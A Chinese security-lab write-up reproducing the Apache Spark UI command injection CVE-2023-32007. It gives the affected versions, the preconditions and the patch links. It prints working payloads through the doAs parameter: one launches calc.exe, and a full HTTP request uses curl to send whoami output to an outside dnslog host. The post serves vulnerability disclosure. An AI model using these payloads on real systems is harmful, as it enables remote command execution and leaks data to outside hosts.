网安引领时代,弥天点亮未来
Apache Spark是美国阿帕奇(Apache)基金会的一款支持非循环数据流和内存计算的大规模数据处理引擎。
Apache Spark 3.4.0之前版本存在命令注入漏洞,该漏洞源于如果ACL启用后,HttpSecurityFilter中的代码路径可以允许通过提供任意用户名来执行模拟,这将导致任意shell命令执行。
3.1.1 <= Apache Spark < 3.2.2
利用条件
Apache Spark UI 启用 ACL ,且低权限
1.下载部署有漏洞版本环境
powershell启动命令
.spark-shell.cmd --conf spark.acls.enable=true
访问漏洞环境
2.对漏洞进行复现
POC (GET)
?doAs=`calc.exe`
执行calc命令
dnslog测试
http://10.211.55.7:4040/jobs/?doAs=`curl+$(whoami)hw9y0l.dnslog.cn`
GET /jobs/?doAs=`curl+$(whoami)hw9y0l.dnslog.cn` HTTP/1.1
Host: 10.211.55.7:4040
Connection: keep-alive
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://lists.apache.org/thread/poxgnxhhnzz735kr1wos366l5vdbb0nv
https://zone.huoxian.cn/d/2761-apache-spark-ui-cve-2023-32007
原文始发于微信公众号(弥天安全实验室):Apache Spark远程代码执行漏洞(CVE-2023-32007)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论